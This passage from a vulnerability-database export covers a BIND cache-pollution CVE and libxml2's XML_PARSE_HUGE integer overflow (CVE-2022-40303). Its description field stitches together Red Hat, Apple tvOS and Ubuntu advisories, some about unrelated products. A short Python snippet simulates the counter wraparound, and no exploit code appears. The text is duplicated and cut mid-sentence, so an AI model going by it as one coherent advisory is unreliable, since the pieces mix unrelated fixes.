},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2021-25220",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170724",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169894",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169846",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169745",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169773",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169587",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166354",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-25220",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-03-23T00:00:00",
"db": "VULMON",
"id": "CVE-2021-25220",
"ident": null
},
{
"date": "2023-01-25T16:07:50",
"db": "PACKETSTORM",
"id": "170724",
"ident": null
},
{
"date": "2022-11-16T16:09:16",
"db": "PACKETSTORM",
"id": "169894",
"ident": null
},
{
"date": "2022-11-15T16:40:52",
"db": "PACKETSTORM",
"id": "169846",
"ident": null
},
{
"date": "2022-11-08T13:44:36",
"db": "PACKETSTORM",
"id": "169745",
"ident": null
},
{
"date": "2022-11-08T13:49:24",
"db": "PACKETSTORM",
"id": "169773",
"ident": null
},
{
"date": "2022-10-31T14:50:53",
"db": "PACKETSTORM",
"id": "169587",
"ident": null
},
{
"date": "2022-03-17T15:54:20",
"db": "PACKETSTORM",
"id": "166354",
"ident": null
},
{
"date": "2022-03-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-1514",
"ident": null
},
{
"date": "2022-05-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-001797",
"ident": null
},
{
"date": "2022-03-23T13:15:07.680000",
"db": "NVD",
"id": "CVE-2021-25220",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-11-28T00:00:00",
"db": "VULMON",
"id": "CVE-2021-25220",
"ident": null
},
{
"date": "2023-07-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-1514",
"ident": null
},
{
"date": "2025-04-17T07:53:00",
"db": "JVNDB",
"id": "JVNDB-2022-001797",
"ident": null
},
{
"date": "2023-11-09T14:44:33.733000",
"db": "NVD",
"id": "CVE-2021-25220",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "166354"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "BIND\u00a0 Cache Pollution with Incorrect Records Vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "environmental issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
}
],
"trust": 0.6
}
}
VAR-202210-0997
Vulnerability from variot - Updated: 2026-04-10 22:15
An issue was discovered in libxml2 before 2.10.3. When parsing a multi-gigabyte XML document with the XML_PARSE_HUGE parser option enabled, several integer counters can overflow. This results in an attempt to access an array at a negative 2GB offset, typically leading to a segmentation fault. libxml2 is written in C and can be called from many languages, such as C, C++, and XSH. Currently there is no further information about this vulnerability; please keep an eye on CNNVD or vendor announcements. Summary:
OpenShift API for Data Protection (OADP) 1.1.2 is now available. Description:
OpenShift API for Data Protection (OADP) enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers 2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters 2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps 2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests
- JIRA issues fixed (https://issues.jboss.org/):
OADP-1056 - DPA fails validation if multiple BSLs have the same provider OADP-1150 - Handle docker env config changes in the oadp-operator OADP-1217 - update velero + restic to 1.9.5 OADP-1256 - Backup stays in progress status after restic pod is restarted due to OOM killed OADP-1289 - Restore partially fails with error "Secrets \"deployer-token-rrjqx\" not found" OADP-290 - Remove creation/usage of velero-privileged SCC
- Description:
Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):
2160492 - CVE-2023-22482 ArgoCD: JWT audience claim is not verified 2162517 - CVE-2023-22736 argocd: Controller reconciles apps outside configured namespaces when sharding is enabled
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis:           Moderate: libxml2 security update
Advisory ID:        RHSA-2023:0338-01
Product:            Red Hat Enterprise Linux
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:0338
Issue date:         2023-01-23
CVE Names:          CVE-2022-40303 CVE-2022-40304
====================================================================
1. Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Security Fix(es):
- libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)

- libxml2: dict corruption caused by entity reference cycles (CVE-2022-40304)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The desktop must be restarted (log out, then log back in) for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE 2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles
- Package List:
Red Hat Enterprise Linux AppStream (v. 9):
aarch64: libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm libxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm libxml2-devel-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm
ppc64le: libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm libxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm libxml2-devel-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm libxml2-debugsource-2.9.13-3.el9_1.s390x.rpm libxml2-devel-2.9.13-3.el9_1.s390x.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm
x86_64: libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm libxml2-debugsource-2.9.13-3.el9_1.i686.rpm libxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm libxml2-devel-2.9.13-3.el9_1.i686.rpm libxml2-devel-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm
Red Hat Enterprise Linux BaseOS (v. 9):
Source: libxml2-2.9.13-3.el9_1.src.rpm
aarch64: libxml2-2.9.13-3.el9_1.aarch64.rpm libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm libxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm
ppc64le: libxml2-2.9.13-3.el9_1.ppc64le.rpm libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm libxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm
s390x: libxml2-2.9.13-3.el9_1.s390x.rpm libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm libxml2-debugsource-2.9.13-3.el9_1.s390x.rpm python3-libxml2-2.9.13-3.el9_1.s390x.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm
x86_64: libxml2-2.9.13-3.el9_1.i686.rpm libxml2-2.9.13-3.el9_1.x86_64.rpm libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm libxml2-debugsource-2.9.13-3.el9_1.i686.rpm libxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-40303 https://access.redhat.com/security/cve/CVE-2022-40304 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2022-12-13-7 tvOS 16.2
tvOS 16.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213535.
Accounts Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A user may be able to view sensitive user information Description: This issue was addressed with improved data protection. CVE-2022-42843: Mickey Jin (@patch1t)
AppleAVD Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Parsing a maliciously crafted video file may lead to kernel code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46694: Andrey Labunets and Nikita Tarakanov
AppleMobileFileIntegrity Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to bypass Privacy preferences Description: This issue was addressed by enabling hardened runtime. CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing
AVEVideoEncoder Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: A logic issue was addressed with improved checks. CVE-2022-42848: ABC Research s.r.o
ImageIO Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46693: Mickey Jin (@patch1t)
ImageIO Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Parsing a maliciously crafted TIFF file may lead to disclosure of user information Description: The issue was addressed with improved memory handling. CVE-2022-42851: Mickey Jin (@patch1t)
IOHIDFamily Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2022-42864: Tommy Muir (@Muirey03)
IOMobileFrameBuffer Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46690: John Aakerblom (@jaakerblom)
Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with additional validation. CVE-2022-46689: Ian Beer of Google Project Zero
Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2022-46701: Felix Poulin-Belanger
Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A remote user may be able to cause kernel code execution Description: The issue was addressed with improved memory handling. CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year Lab
Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42845: Adam Doupé of ASU SEFCOM
libxml2 Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2022-40303: Maddie Stone of Google Project Zero
libxml2 Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: This issue was addressed with improved checks. CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero
Preferences Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to use arbitrary entitlements Description: A logic issue was addressed with improved state management. CVE-2022-42855: Ivan Fratric of Google Project Zero
Safari Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Visiting a website that frames malicious content may lead to UI spoofing Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. CVE-2022-46695: KirtiKumar Anandrao Ramchandani
Software Update Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A user may be able to elevate privileges Description: An access issue existed with privileged API calls. This issue was addressed with additional restrictions. CVE-2022-42849: Mickey Jin (@patch1t)
Weather Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to read sensitive location information Description: The issue was addressed with improved handling of caches. CVE-2022-42866: an anonymous researcher
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. WebKit Bugzilla: 245521 CVE-2022-42867: Maddie Stone of Google Project Zero
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory consumption issue was addressed with improved memory handling. WebKit Bugzilla: 245466 CVE-2022-46691: an anonymous researcher
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may bypass Same Origin Policy Description: A logic issue was addressed with improved state management. WebKit Bugzilla: 246783 CVE-2022-46692: KirtiKumar Anandrao Ramchandani
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: The issue was addressed with improved memory handling. CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. WebKit Bugzilla: 246942 CVE-2022-46696: Samuel Groß of Google V8 Security WebKit Bugzilla: 247562 CVE-2022-46700: Samuel Groß of Google V8 Security
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A logic issue was addressed with improved checks. CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 247420 CVE-2022-46699: Samuel Groß of Google V8 Security WebKit Bugzilla: 244622 CVE-2022-42863: an anonymous researcher
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1. Description: A type confusion issue was addressed with improved state handling. WebKit Bugzilla: 248266 CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group
Additional recognition
Kernel We would like to acknowledge Zweig of Kunlun Lab for their assistance.
Safari Extensions We would like to acknowledge Oliver Dunk and Christian R. of 1Password for their assistance.
WebKit We would like to acknowledge an anonymous researcher and scarlet for their assistance.
Apple TV will periodically check for software updates. Alternatively, you may manually check for software updates by selecting "Settings -> System -> Software Update -> Update Software." To check the current version of software, select "Settings -> General -> About." All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
Bugs fixed (https://bugzilla.redhat.com/):
2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be 2163037 - CVE-2022-3064 go-yaml: Improve heuristics preventing CPU/memory abuse by parsing malicious or large YAML documents 2167819 - CVE-2023-23947 ArgoCD: Users with any cluster secret update access may update out-of-bounds cluster secrets
==========================================================================
Ubuntu Security Notice USN-5760-2
December 05, 2022

libxml2 vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 ESM
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in libxml2. This update provides the corresponding updates for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM.
Original advisory details:
It was discovered that libxml2 incorrectly handled certain XML files. An attacker could possibly use this issue to expose sensitive information or cause a crash. An attacker could possibly use this issue to execute arbitrary code. (CVE-2022-40304)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 ESM:
  libxml2 2.9.3+dfsg1-1ubuntu0.7+esm4
  libxml2-utils 2.9.3+dfsg1-1ubuntu0.7+esm4

Ubuntu 14.04 ESM:
  libxml2 2.9.1+dfsg1-3ubuntu4.13+esm4
  libxml2-utils 2.9.1+dfsg1-3ubuntu4.13+esm4
In general, a standard system update will make all the necessary changes.
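The root cause reported for CVE-2022-40303 — parser byte counters held in 32-bit signed integers that overflow on multi-gigabyte input (reachable only with the XML_PARSE_HUGE option) and end up as negative ~2 GB array offsets — can be sketched numerically. This is an illustrative simulation of 32-bit wraparound, not libxml2 code:

```python
def wrap_int32(n: int) -> int:
    """Reduce an arbitrary integer to C's two's-complement 32-bit 'int' range."""
    n &= 0xFFFFFFFF
    return n - 0x1_0000_0000 if n >= 0x8000_0000 else n

# A hypothetical parser counter tracking bytes consumed from a
# multi-gigabyte document (past the 2 GiB boundary of a signed int):
consumed = 2**31 + 100            # just over 2 GiB of input
offset = wrap_int32(consumed)     # the value a 32-bit counter would hold
print(offset)                     # -2147483548: a negative ~2 GB offset
```

Using such a wrapped counter to index a buffer yields the out-of-bounds access at a negative 2 GB offset that typically produces the segmentation fault described above; the 2.10.3 fix widens or bounds these counters.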
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "tvos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "16.2"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "clustered data ontap antivirus connector",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0"
},
{
"_id": null,
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.2"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "manageability sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ipados",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.2"
},
{
"_id": null,
"model": "libxml2",
"scope": "lt",
"trust": 1.0,
"vendor": "xmlsoft",
"version": "2.10.3"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.7.2"
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "watchos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "9.2"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "snapmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.6.2"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-40303"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "171043"
}
],
"trust": 0.6
},
"cve": "CVE-2022-40303",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2022-40303",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-40303",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-40303",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-40303"
},
{
"db": "NVD",
"id": "CVE-2022-40303"
}
]
},
"description": {
"_id": null,
"data": "An issue was discovered in libxml2 before 2.10.3. When parsing a multi-gigabyte XML document with the XML_PARSE_HUGE parser option enabled, several integer counters can overflow. This results in an attempt to access an array at a negative 2GB offset, typically leading to a segmentation fault. It is written in C language and can be called by many languages, such as C language, C++, XSH. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Summary:\n\nOpenShift API for Data Protection (OADP) 1.1.2 is now available. Description:\n\nOpenShift API for Data Protection (OADP) enables you to back up and restore\napplication resources, persistent volume data, and internal container\nimages to external backup storage. OADP enables both file system-based and\nsnapshot-based backups for persistent volumes. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers\n2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters\n2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps\n2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nOADP-1056 - DPA fails validation if multiple BSLs have the same provider\nOADP-1150 - Handle docker env config changes in the oadp-operator\nOADP-1217 - update velero + restic to 1.9.5\nOADP-1256 - Backup stays in progress status after restic pod is restarted due to OOM killed\nOADP-1289 - Restore partially fails with error \"Secrets \\\"deployer-token-rrjqx\\\" not found\"\nOADP-290 - Remove creation/usage of velero-privileged SCC\n\n6. 
Description:\n\nRed Hat Openshift GitOps is a declarative way to implement continuous\ndeployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):\n\n2160492 - CVE-2023-22482 ArgoCD: JWT audience claim is not verified\n2162517 - CVE-2023-22736 argocd: Controller reconciles apps outside configured namespaces when sharding is enabled\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: libxml2 security update\nAdvisory ID: RHSA-2023:0338-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:0338\nIssue date: 2023-01-23\nCVE Names: CVE-2022-40303 CVE-2022-40304\n====================================================================\n1. Summary:\n\nAn update for libxml2 is now available for Red Hat Enterprise Linux 9. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSecurity Fix(es):\n\n* libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)\n\n* libxml2: dict corruption caused by entity reference cycles\n(CVE-2022-40304)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. 
Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe desktop must be restarted (log out, then log back in) for this update\nto take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE\n2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 9):\n\naarch64:\nlibxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-devel-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-devel-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.s390x.rpm\nlibxml2-devel-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.i686.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-devel-2.9.13-3.el9_1.i686.rpm\nlibxml2-devel-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\n\nRed Hat Enterprise Linux BaseOS (v. 
9):\n\nSource:\nlibxml2-2.9.13-3.el9_1.src.rpm\n\naarch64:\nlibxml2-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\n\nppc64le:\nlibxml2-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\n\nx86_64:\nlibxml2-2.9.13-3.el9_1.i686.rpm\nlibxml2-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.i686.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\n\nThese 